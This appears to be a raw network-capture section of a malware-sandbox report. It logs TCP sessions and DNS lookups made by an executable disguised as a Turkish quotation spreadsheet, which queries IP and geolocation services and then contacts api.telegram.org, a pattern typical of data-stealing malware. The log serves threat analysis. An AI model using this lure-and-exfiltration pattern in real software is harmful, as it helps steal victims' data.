                                                                      Oct 7, 2024 14:52:27.494276047 CEST44349776188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:27.495192051 CEST44349775188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:27.496596098 CEST49775443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:27.496611118 CEST44349775188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:27.624358892 CEST44349776188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:27.624598980 CEST44349776188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:27.624742031 CEST49776443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:27.625108957 CEST49776443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:27.627551079 CEST44349775188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:27.627638102 CEST44349775188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:27.627728939 CEST49775443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:27.627984047 CEST49775443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:27.631294966 CEST4976980192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:27.632237911 CEST4978280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:27.632819891 CEST4975880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:27.633769035 CEST4978380192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:27.636471987 CEST8049769132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:27.636535883 CEST4976980192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:27.637442112 CEST8049782132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:27.637531996 CEST4978280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:27.637656927 CEST4978280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:27.638436079 CEST8049758132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:27.638513088 CEST4975880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:27.638775110 CEST8049783132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:27.639215946 CEST4978380192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:27.639215946 CEST4978380192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:27.642595053 CEST8049782132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:27.644020081 CEST8049783132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:28.292773008 CEST8049782132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:28.294418097 CEST49788443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:28.294440031 CEST44349788188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:28.295672894 CEST49788443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:28.296044111 CEST49788443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:28.296055079 CEST44349788188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:28.342791080 CEST4978280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:28.383421898 CEST8049783132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:28.388209105 CEST49790443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:28.388324976 CEST44349790188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:28.388442039 CEST49790443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:28.388840914 CEST49790443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:28.388880014 CEST44349790188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:28.436531067 CEST4978380192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:28.762404919 CEST44349788188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:28.764272928 CEST49788443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:28.764296055 CEST44349788188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:28.863835096 CEST44349790188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:28.865581036 CEST49790443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:28.865675926 CEST44349790188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:28.907440901 CEST44349788188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:28.907505035 CEST44349788188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:28.907650948 CEST49788443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:28.908015013 CEST49788443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:28.911009073 CEST4978280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:28.912164927 CEST4979180192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:28.916290045 CEST8049782132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:28.916354895 CEST4978280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:28.916928053 CEST8049791132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:28.917067051 CEST4979180192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:28.917120934 CEST4979180192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:28.922333002 CEST8049791132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:29.036838055 CEST44349790188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:29.036911011 CEST44349790188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:29.036986113 CEST49790443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:29.037425041 CEST49790443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:29.042093992 CEST4979680192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:29.042541981 CEST4978380192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:29.047374010 CEST8049796132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:29.047461033 CEST4979680192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:29.047697067 CEST4979680192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:29.049786091 CEST8049783132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:29.049995899 CEST4978380192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:29.052917957 CEST8049796132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:29.610243082 CEST8049791132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:29.613284111 CEST49798443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:29.613329887 CEST44349798188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:29.613403082 CEST49798443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:29.613778114 CEST49798443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:29.613795996 CEST44349798188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:29.655323029 CEST4979180192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:29.719218016 CEST8049796132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:29.725585938 CEST49800443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:29.725635052 CEST44349800188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:29.725684881 CEST49800443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:29.725984097 CEST49800443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:29.726001978 CEST44349800188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:29.764691114 CEST4979680192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:30.063359976 CEST44349798188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:30.109220982 CEST49798443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:30.123410940 CEST49798443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:30.123420954 CEST44349798188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:30.193424940 CEST44349800188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:30.225161076 CEST49800443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:30.225208044 CEST44349800188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:30.226540089 CEST44349798188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:30.227199078 CEST44349798188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:30.227351904 CEST49798443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:30.228224039 CEST49798443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:30.232122898 CEST4979180192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:30.233087063 CEST4980580192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:30.237766981 CEST8049791132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:30.238074064 CEST4979180192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:30.238621950 CEST8049805132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:30.238686085 CEST4980580192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:30.238791943 CEST4980580192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:30.243746042 CEST8049805132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:30.327826977 CEST44349800188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:30.328056097 CEST44349800188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:30.328214884 CEST49800443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:30.345957994 CEST49800443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:30.352341890 CEST4980680192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:30.358329058 CEST8049806132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:30.358520985 CEST4980680192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:30.359100103 CEST4980680192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:30.365039110 CEST8049806132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:30.883985996 CEST8049805132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:30.885129929 CEST49812443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:30.885179996 CEST44349812188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:30.885246038 CEST49812443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:30.885469913 CEST49812443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:30.885481119 CEST44349812188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:30.936541080 CEST4980580192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:31.007693052 CEST8049806132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:31.009294033 CEST49813443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:31.009341002 CEST44349813188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:31.009413958 CEST49813443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:31.009640932 CEST49813443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:31.009655952 CEST44349813188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:31.061562061 CEST4980680192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:31.397511959 CEST44349812188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:31.399612904 CEST49812443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:31.399636030 CEST44349812188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:31.502896070 CEST44349813188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:31.505546093 CEST49813443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:31.505575895 CEST44349813188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:31.531491995 CEST44349812188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:31.531714916 CEST44349812188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:31.531776905 CEST49812443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:31.533046961 CEST49812443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:31.539475918 CEST4980580192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:31.540693998 CEST4981880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:31.544926882 CEST8049805132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:31.544980049 CEST4980580192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:31.545815945 CEST8049818132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:31.545880079 CEST4981880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:31.547729969 CEST4981880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:31.552551985 CEST8049818132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:31.666218042 CEST44349813188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:31.666287899 CEST44349813188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:31.666337013 CEST49813443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:31.667571068 CEST49813443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:31.671422005 CEST4980680192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:31.672399044 CEST4981980192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:31.676592112 CEST8049806132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:31.676640034 CEST4980680192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:31.677400112 CEST8049819132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:31.677453995 CEST4981980192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:31.677540064 CEST4981980192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:31.682775021 CEST8049819132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:32.190016985 CEST8049818132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:32.198117018 CEST49823443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:32.198147058 CEST44349823188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:32.198221922 CEST49823443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:32.198544025 CEST49823443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:32.198554993 CEST44349823188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:32.233428955 CEST4981880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:32.351125956 CEST8049819132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:32.352626085 CEST49826443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:32.352708101 CEST44349826188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:32.352823973 CEST49826443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:32.353112936 CEST49826443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:32.353141069 CEST44349826188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:32.405306101 CEST4981980192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:32.634907961 CEST44349823188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:32.636728048 CEST49823443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:32.636760950 CEST44349823188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:32.788690090 CEST44349823188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:32.788916111 CEST44349823188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:32.788984060 CEST49823443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:32.789338112 CEST49823443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:32.806042910 CEST4981880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:32.811403036 CEST8049818132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:32.811477900 CEST4981880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:32.815346003 CEST49828443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:32.815428972 CEST44349828149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:32.815692902 CEST49828443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:32.816346884 CEST49828443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:32.816371918 CEST44349828149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:32.821026087 CEST44349826188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:32.822823048 CEST49826443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:32.822880983 CEST44349826188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:33.142035007 CEST44349826188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:33.142261028 CEST44349826188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:33.142313957 CEST49826443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:33.306745052 CEST49826443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:33.451596975 CEST44349828149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:33.451726913 CEST49828443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:33.493256092 CEST49828443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:33.493285894 CEST44349828149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:33.494096994 CEST44349828149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:33.495682955 CEST49828443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:33.502156973 CEST4981980192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:33.503945112 CEST4983480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:33.507455111 CEST8049819132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:33.507534981 CEST4981980192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:33.508861065 CEST8049834132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:33.508930922 CEST4983480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:33.509063959 CEST4983480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:33.513861895 CEST8049834132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:33.543431997 CEST44349828149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:33.710601091 CEST44349828149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:33.710762978 CEST44349828149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:33.710820913 CEST49828443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:33.715301991 CEST49828443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:34.161607981 CEST8049834132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:34.163330078 CEST49839443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:34.163356066 CEST44349839188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:34.163506985 CEST49839443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:34.163724899 CEST49839443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:34.163737059 CEST44349839188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:34.202261925 CEST4983480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:34.606904030 CEST44349839188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:34.610533953 CEST49839443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:34.610574007 CEST44349839188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:34.760921955 CEST44349839188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:34.761049986 CEST44349839188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:34.761267900 CEST49839443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:34.761807919 CEST49839443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:34.780466080 CEST4983480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:34.781367064 CEST4984480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:34.785653114 CEST8049834132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:34.785706997 CEST4983480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:34.786151886 CEST8049844132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:34.786206961 CEST4984480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:34.786511898 CEST4984480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:34.791372061 CEST8049844132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:35.449213982 CEST8049844132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:35.450678110 CEST49850443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:35.450726032 CEST44349850188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:35.450844049 CEST49850443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:35.451415062 CEST49850443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:35.451426983 CEST44349850188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:35.499057055 CEST4984480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:35.894838095 CEST44349850188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:35.896743059 CEST49850443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:35.896773100 CEST44349850188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:36.041136026 CEST44349850188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:36.041198969 CEST44349850188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:36.041325092 CEST49850443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:36.124612093 CEST49850443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:36.517879009 CEST4984480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:36.523034096 CEST8049844132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:36.523086071 CEST4984480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:36.552664042 CEST4986280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:36.557508945 CEST8049862132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:36.557615995 CEST4986280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:36.561764956 CEST4986280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:36.566574097 CEST8049862132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:37.248243093 CEST8049862132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:37.250086069 CEST49868443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:37.250122070 CEST44349868188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:37.250195026 CEST49868443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:37.253122091 CEST49868443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:37.253149033 CEST44349868188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:37.296005964 CEST4986280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:37.712558985 CEST44349868188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:37.724905968 CEST49868443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:37.724936008 CEST44349868188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:37.858125925 CEST44349868188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:37.858366013 CEST44349868188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:37.858477116 CEST49868443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:37.859091997 CEST49868443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:37.917593956 CEST4986280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:37.918299913 CEST49871443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:37.918335915 CEST44349871149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:37.918396950 CEST49871443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:37.919157982 CEST49871443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:37.919172049 CEST44349871149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:37.922775030 CEST8049862132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:37.922831059 CEST4986280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:38.544433117 CEST44349871149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:38.544759035 CEST49871443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:38.547406912 CEST49871443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:38.547416925 CEST44349871149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:38.547668934 CEST44349871149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:38.549069881 CEST49871443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:38.595408916 CEST44349871149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:38.826586008 CEST44349871149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:38.826651096 CEST44349871149.154.167.220192.168.2.7
                                                                      Oct 7, 2024 14:52:38.826793909 CEST49871443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:38.841393948 CEST49871443192.168.2.7149.154.167.220
                                                                      Oct 7, 2024 14:52:48.784614086 CEST4974480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:53.359272957 CEST4979680192.168.2.7132.226.247.73
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 7, 2024 14:52:21.123794079 CEST5622053192.168.2.71.1.1.1
                                                                      Oct 7, 2024 14:52:21.130891085 CEST53562201.1.1.1192.168.2.7
                                                                      Oct 7, 2024 14:52:22.044781923 CEST6329153192.168.2.71.1.1.1
                                                                      Oct 7, 2024 14:52:22.054600000 CEST53632911.1.1.1192.168.2.7
                                                                      Oct 7, 2024 14:52:32.805818081 CEST6258653192.168.2.71.1.1.1
                                                                      Oct 7, 2024 14:52:32.813020945 CEST53625861.1.1.1192.168.2.7
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Oct 7, 2024 14:52:21.123794079 CEST192.168.2.71.1.1.10x1866Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 14:52:22.044781923 CEST192.168.2.71.1.1.10xbb69Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 14:52:32.805818081 CEST192.168.2.71.1.1.10xe036Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Oct 7, 2024 14:52:21.130891085 CEST1.1.1.1192.168.2.70x1866No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                      Oct 7, 2024 14:52:21.130891085 CEST1.1.1.1192.168.2.70x1866No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 14:52:21.130891085 CEST1.1.1.1192.168.2.70x1866No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 14:52:21.130891085 CEST1.1.1.1192.168.2.70x1866No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 14:52:21.130891085 CEST1.1.1.1192.168.2.70x1866No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 14:52:21.130891085 CEST1.1.1.1192.168.2.70x1866No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 14:52:22.054600000 CEST1.1.1.1192.168.2.70xbb69No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 14:52:22.054600000 CEST1.1.1.1192.168.2.70xbb69No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 14:52:32.813020945 CEST1.1.1.1192.168.2.70xe036No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                      • reallyfreegeoip.org
                                                                      • api.telegram.org
                                                                      • checkip.dyndns.org
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.749722132.226.247.73807944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
